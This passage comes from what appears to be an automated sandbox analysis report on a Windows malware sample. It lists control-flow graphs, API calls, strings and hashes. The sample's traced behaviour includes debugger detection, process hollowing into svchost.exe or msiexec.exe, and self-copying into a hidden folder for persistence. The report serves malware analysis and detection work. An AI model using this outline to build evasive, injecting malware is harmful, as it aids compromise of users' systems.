268->272 273 7ff7821c25f8-7ff7821c2683 270->273 274 7ff7821c27d7 270->274 271->220 272->220 275 7ff7821c2695-7ff7821c26a3 273->275 274->264 276 7ff7821c27d2 275->276 277 7ff7821c26a9-7ff7821c26dc 275->277 276->270 278 7ff7821c26e0-7ff7821c27b3 ReadProcessMemory WriteProcessMemory 277->278 279 7ff7821c26de 277->279 281 7ff7821c27b5-7ff7821c27c8 VirtualFree 278->281 282 7ff7821c27cd 278->282 279->275 281->220 282->276
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.1939052907.00007FF7821C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7821C0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.1939038046.00007FF7821C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.1939069166.00007FF7821C5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.1939097903.00007FF7821C7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.1939116112.00007FF7821C8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_7ff7821c0000_7D3ED97FB83B796922796.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FileModuleName
                                                                                                                                                                                                                                                    • String ID: .reloc$@$NtUnmapViewOfSection$ntdll
                                                                                                                                                                                                                                                    • API String ID: 514040917-3001742581
                                                                                                                                                                                                                                                    • Opcode ID: f917b2b91664f8174983d74143afff0df1ca4cc990d6240a450e42c88ea1ecf1
                                                                                                                                                                                                                                                    • Instruction ID: 2da0fa55fcea89cb2d7a6c7a4fc17dd788cc59436cc2afd6393f3616b62884e1
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f917b2b91664f8174983d74143afff0df1ca4cc990d6240a450e42c88ea1ecf1
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4A32F936A0CAC186E7B0DB15F8547AAA7A0FB88755F604136DA8D83B68DFBCD445CB10
                                                                                                                                                                                                                                                    Function 00007FF7821C3360 Relevance: 47.4, APIs: 20, Strings: 7, Instructions: 143COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 283 7ff7821c3360-7ff7821c3376 call 7ff7821c10a0 call 7ff7821c3120 288 7ff7821c3380-7ff7821c33ae call 7ff7821c4168 call 7ff7821c3be8 call 7ff7821c3e18 283->288 289 7ff7821c3378-7ff7821c337a ExitProcess 283->289 296 7ff7821c33b0-7ff7821c33c1 call 7ff7821c42a8 288->296 297 7ff7821c33ff-7ff7821c3412 call 7ff7821c3e18 288->297 304 7ff7821c33d6-7ff7821c33d8 ExitProcess 296->304 305 7ff7821c33c3-7ff7821c33d4 call 7ff7821c42a8 296->305 302 7ff7821c3450-7ff7821c3463 call 7ff7821c3e18 297->302 303 7ff7821c3414-7ff7821c3425 call 7ff7821c42a8 297->303 313 7ff7821c34a6-7ff7821c34bc call 7ff7821c3978 call 7ff7821c32f0 302->313 314 7ff7821c3465-7ff7821c3476 call 7ff7821c42a8 302->314 315 7ff7821c342f call 7ff7821c3180 303->315 316 7ff7821c3427-7ff7821c3429 ExitProcess 303->316 305->304 312 7ff7821c33de call 7ff7821c3210 305->312 323 7ff7821c33e3-7ff7821c33e8 312->323 334 7ff7821c3512-7ff7821c35d4 CreateThread * 3 WaitForSingleObject * 3 ExitProcess 313->334 335 7ff7821c34be-7ff7821c34cf call 7ff7821c42a8 313->335 330 7ff7821c3480 call 7ff7821c3180 314->330 331 7ff7821c3478-7ff7821c347a ExitProcess 314->331 321 7ff7821c3434-7ff7821c3439 315->321 325 7ff7821c3448-7ff7821c344a ExitProcess 321->325 326 7ff7821c343b-7ff7821c3446 Sleep 321->326 328 7ff7821c33ea-7ff7821c33f5 Sleep 323->328 329 7ff7821c33f7-7ff7821c33f9 ExitProcess 323->329 326->321 328->323 336 7ff7821c3485-7ff7821c348a 330->336 341 7ff7821c34d1-7ff7821c34e2 call 7ff7821c42a8 335->341 342 7ff7821c34e4-7ff7821c34e6 ExitProcess 335->342 338 7ff7821c3499-7ff7821c349b ExitProcess 336->338 339 7ff7821c348c-7ff7821c3497 Sleep 336->339 339->336 341->342 345 7ff7821c34ec call 7ff7821c3210 341->345 347 7ff7821c34f1-7ff7821c34f6 345->347 348 7ff7821c3505-7ff7821c3507 ExitProcess 347->348 349 7ff7821c34f8-7ff7821c3503 Sleep 347->349 349->347
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.1939052907.00007FF7821C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7821C0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.1939038046.00007FF7821C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.1939069166.00007FF7821C5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.1939097903.00007FF7821C7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.1939116112.00007FF7821C8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_7ff7821c0000_7D3ED97FB83B796922796.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExitProcess$DebuggerPresent
                                                                                                                                                                                                                                                    • String ID: audiodg.exe$msiexec.exe$svchost.exe$worker_VznLpbPuTg$worker_VznLpbPuTg$worker_ZLpjbmHstE$worker_pPCJtqmKMc
                                                                                                                                                                                                                                                    • API String ID: 613740775-1274706621
                                                                                                                                                                                                                                                    • Opcode ID: 59c45464f771be6ff5eec6c028a7fa3e660507d852d3508378b87ba2b614c531
                                                                                                                                                                                                                                                    • Instruction ID: cc0211dbf0dd38025c9d792d4a3cde22720e24b735234593e64a23d6e0fcfbb9
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 59c45464f771be6ff5eec6c028a7fa3e660507d852d3508378b87ba2b614c531
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FD610A28E1C64391EA647B21B8562BAAA64BF84763FF00135D54EC66F5CEFDE406D330
                                                                                                                                                                                                                                                    Function 00007FF7821C4168 Relevance: 10.6, APIs: 7, Instructions: 67COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.1939052907.00007FF7821C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7821C0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.1939038046.00007FF7821C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.1939069166.00007FF7821C5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.1939097903.00007FF7821C7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.1939116112.00007FF7821C8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_7ff7821c0000_7D3ED97FB83B796922796.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Token$InformationProcess$CloseCurrentHandleOpen
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 434396405-0
                                                                                                                                                                                                                                                    • Opcode ID: 5572af213e5128c0dc0009257d67e79a385e61fda350e8b67cdc156981955163
                                                                                                                                                                                                                                                    • Instruction ID: ea3ca4e193e1eaad58a67b7bbb814dc94101045d623b7e34611babc304269c2e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5572af213e5128c0dc0009257d67e79a385e61fda350e8b67cdc156981955163
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9531193AA1C68186E6509B45F44062AFBA4FBC47A1F601031FA8E83B68CFBCD441CB10
                                                                                                                                                                                                                                                    Function 00007FF7821C37C8 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 43stringCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7821C3648: GetWindowsDirectoryW.KERNEL32 ref: 00007FF7821C3688
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7821C3648: GetVolumeInformationW.KERNELBASE ref: 00007FF7821C3705
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7821C3648: wsprintfW.USER32 ref: 00007FF7821C37A6
                                                                                                                                                                                                                                                    • SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7821C39AD), ref: 00007FF7821C3811
                                                                                                                                                                                                                                                    • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7821C39AD), ref: 00007FF7821C3826
                                                                                                                                                                                                                                                    • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7821C39AD), ref: 00007FF7821C3839
                                                                                                                                                                                                                                                    • CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7821C39AD), ref: 00007FF7821C3849
                                                                                                                                                                                                                                                    • SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7821C39AD), ref: 00007FF7821C385C
                                                                                                                                                                                                                                                    • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7821C39AD), ref: 00007FF7821C3871
                                                                                                                                                                                                                                                    • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7821C39AD), ref: 00007FF7821C3884
                                                                                                                                                                                                                                                    • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7821C39AD), ref: 00007FF7821C3899
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.1939052907.00007FF7821C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7821C0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.1939038046.00007FF7821C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.1939069166.00007FF7821C5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.1939097903.00007FF7821C7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.1939116112.00007FF7821C8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_7ff7821c0000_7D3ED97FB83B796922796.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcat$Directory$AttributesCreateFileFolderInformationPathVolumeWindowswsprintf
                                                                                                                                                                                                                                                    • String ID: .exe
                                                                                                                                                                                                                                                    • API String ID: 1846285901-4119554291
                                                                                                                                                                                                                                                    • Opcode ID: 394754d39533e2b7955e5e4960e6c7924f9d2ad5806592b2d3c7930fbbf7790f
                                                                                                                                                                                                                                                    • Instruction ID: 45d1a3beb7e98a735f9a84324cc35bd46d303414b3e68cd64f98fc786ebd98d4
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 394754d39533e2b7955e5e4960e6c7924f9d2ad5806592b2d3c7930fbbf7790f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7B116A25A2998295DB60EB25F85076AA732FFC4BA1FA05031D54EC3B39DE7CD01CC740
                                                                                                                                                                                                                                                    Function 00007FF7821C3978 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 37fileCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7821C3648: GetWindowsDirectoryW.KERNEL32 ref: 00007FF7821C3688
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7821C3648: GetVolumeInformationW.KERNELBASE ref: 00007FF7821C3705
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7821C3648: wsprintfW.USER32 ref: 00007FF7821C37A6
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7821C37C8: SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7821C39AD), ref: 00007FF7821C3811
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7821C37C8: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7821C39AD), ref: 00007FF7821C3826
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7821C37C8: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7821C39AD), ref: 00007FF7821C3839
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7821C37C8: CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7821C39AD), ref: 00007FF7821C3849
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7821C37C8: SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7821C39AD), ref: 00007FF7821C385C
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7821C37C8: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7821C39AD), ref: 00007FF7821C3871
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7821C37C8: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7821C39AD), ref: 00007FF7821C3884
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7821C37C8: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7821C39AD), ref: 00007FF7821C3899
                                                                                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32 ref: 00007FF7821C39BD
                                                                                                                                                                                                                                                    • DeleteFileW.KERNELBASE ref: 00007FF7821C39C8
                                                                                                                                                                                                                                                    • CopyFileW.KERNELBASE ref: 00007FF7821C39E1
                                                                                                                                                                                                                                                    • SetFileAttributesW.KERNEL32 ref: 00007FF7821C39F9
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.1939052907.00007FF7821C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7821C0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.1939038046.00007FF7821C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.1939069166.00007FF7821C5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.1939097903.00007FF7821C7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.1939116112.00007FF7821C8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_7ff7821c0000_7D3ED97FB83B796922796.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Filelstrcat$AttributesDirectory$CopyCreateDeleteFolderInformationModuleNamePathVolumeWindowswsprintf
                                                                                                                                                                                                                                                    • String ID: Services
                                                                                                                                                                                                                                                    • API String ID: 3209240227-2319745855
                                                                                                                                                                                                                                                    • Opcode ID: d5f45a330b346b5a18c04901060aca7385ba15bdd6f6fdd8f78c01ad9e797b65
                                                                                                                                                                                                                                                    • Instruction ID: 999729159504be6c0aa9d8941998eea86fd334c0253380a37b77b5bc40947c22
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d5f45a330b346b5a18c04901060aca7385ba15bdd6f6fdd8f78c01ad9e797b65
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 44018429E18582A2EB50EB24F8513AA97A0FB94755FF04032D24DC26B4EE6CD20EDB50
                                                                                                                                                                                                                                                    Function 00007FF7821C3648 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.1939052907.00007FF7821C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7821C0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.1939038046.00007FF7821C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.1939069166.00007FF7821C5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.1939097903.00007FF7821C7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.1939116112.00007FF7821C8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_7ff7821c0000_7D3ED97FB83B796922796.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: DirectoryInformationVolumeWindowswsprintf
                                                                                                                                                                                                                                                    • String ID: %08lX%04lX%lu
                                                                                                                                                                                                                                                    • API String ID: 3001812590-640692576
                                                                                                                                                                                                                                                    • Opcode ID: 7df018cf59f0a70d05929fc8b75d38fd6e213b17dbb89485f2078f182261baa5
                                                                                                                                                                                                                                                    • Instruction ID: 61b30b29b3bd20e7c85765e3cd61feb604059889334e3f107c7d890de3a496d9
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7df018cf59f0a70d05929fc8b75d38fd6e213b17dbb89485f2078f182261baa5
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D1310A26A1C6C196D730EB64F4983ABB7A0FB95715FA00136D28DC3A68DB7DC509CF50
                                                                                                                                                                                                                                                    Function 00007FF7821C3120 Relevance: 4.5, APIs: 3, Instructions: 23COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.1939052907.00007FF7821C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7821C0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.1939038046.00007FF7821C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.1939069166.00007FF7821C5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.1939097903.00007FF7821C7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.1939116112.00007FF7821C8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_7ff7821c0000_7D3ED97FB83B796922796.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: DebuggerPresent$CheckCurrentProcessRemote
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3920101602-0
                                                                                                                                                                                                                                                    • Opcode ID: e9bd88260ec4cc61dc4a106c2a67c42b8d4857221eedeb8770e35a2a76d82c30
                                                                                                                                                                                                                                                    • Instruction ID: 2fa5e20c22b5fbda37c46c42b5438424b1865c745d6df019eaa58ea2caeda00c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e9bd88260ec4cc61dc4a106c2a67c42b8d4857221eedeb8770e35a2a76d82c30
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 52F03018D0C28289E6306B55B40436B9BA0FB45B16FB01174D58D856A4CFECD506EB31
                                                                                                                                                                                                                                                    Function 00007FF7821C1050 Relevance: 3.0, APIs: 2, Instructions: 13libraryloaderCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 402 7ff7821c1050-7ff7821c108c LoadLibraryA GetProcAddress
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • LoadLibraryA.KERNELBASE(?,?,?,?,?,?,00007FF7821C1165,?,?,?,?,?,?,00007FF7821C336C), ref: 00007FF7821C1063
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,?,?,?,?,?,00007FF7821C1165,?,?,?,?,?,?,00007FF7821C336C), ref: 00007FF7821C1078
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.1939052907.00007FF7821C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7821C0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.1939038046.00007FF7821C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.1939069166.00007FF7821C5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.1939097903.00007FF7821C7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.1939116112.00007FF7821C8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_7ff7821c0000_7D3ED97FB83B796922796.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2574300362-0
                                                                                                                                                                                                                                                    • Opcode ID: 93e6198b99d5b023e326d4442bf2863252b60b3359320dbad58740b6c0f3b775
                                                                                                                                                                                                                                                    • Instruction ID: f326cf2314f85bd6a9a3e998e68fd34736afe9d15eae0613db502a32e465634a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 93e6198b99d5b023e326d4442bf2863252b60b3359320dbad58740b6c0f3b775
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 66E09A76908F4095C620AB15F84101ABB74FBC97A5FA04225EACD42B38DF7CC165CB00
                                                                                                                                                                                                                                                    Function 00007FF7821C3A28 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 403 7ff7821c3a28-7ff7821c3a37 404 7ff7821c3a39-7ff7821c3a46 VirtualFree 403->404 405 7ff7821c3a4c-7ff7821c3a50 403->405 404->405
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.1939052907.00007FF7821C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7821C0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.1939038046.00007FF7821C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.1939069166.00007FF7821C5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.1939097903.00007FF7821C7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.1939116112.00007FF7821C8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_7ff7821c0000_7D3ED97FB83B796922796.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FreeVirtual
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1263568516-0
                                                                                                                                                                                                                                                    • Opcode ID: 8c163ca7f34193cc1aec9bafbbcdec196117a86198a0a8583c7d817857ed249e
                                                                                                                                                                                                                                                    • Instruction ID: ceef260b9c62afe78b207aaaff567ede857b91ed3107e3eb9ccb7922c825fb82
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8c163ca7f34193cc1aec9bafbbcdec196117a86198a0a8583c7d817857ed249e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 54D01225E3894191E794BB27F889715E6A0FBC4B45FA09035E68D81A78CF7CC0A9CF00
                                                                                                                                                                                                                                                    Function 00007FF7821C3A58 Relevance: 1.3, APIs: 1, Instructions: 10memoryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 406 7ff7821c3a58-7ff7821c3a7e VirtualAlloc
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.1939052907.00007FF7821C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7821C0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.1939038046.00007FF7821C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.1939069166.00007FF7821C5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.1939097903.00007FF7821C7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.1939116112.00007FF7821C8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_7ff7821c0000_7D3ED97FB83B796922796.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4275171209-0
                                                                                                                                                                                                                                                    • Opcode ID: 3461df374489d36aa0d64d8213e908c2e8b1ca3e9096222484e3775c0be6d7a2
                                                                                                                                                                                                                                                    • Instruction ID: 50ec13972a150ea61bdba777e82dba8f6d8ebf9983fadcc707ef330f28c7a071
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3461df374489d36aa0d64d8213e908c2e8b1ca3e9096222484e3775c0be6d7a2
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CAC012B5F2618087DB1CAF22E491A0A6A20B784741FA08028EA0287B98C93EC2528F00

                                                                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                                                                    Function 00007FF7821C3FE8 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 75synchronizationCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.1939052907.00007FF7821C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7821C0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.1939038046.00007FF7821C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.1939069166.00007FF7821C5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.1939097903.00007FF7821C7000.00000004.00000001.01000000.00000006.sdmpDownload File
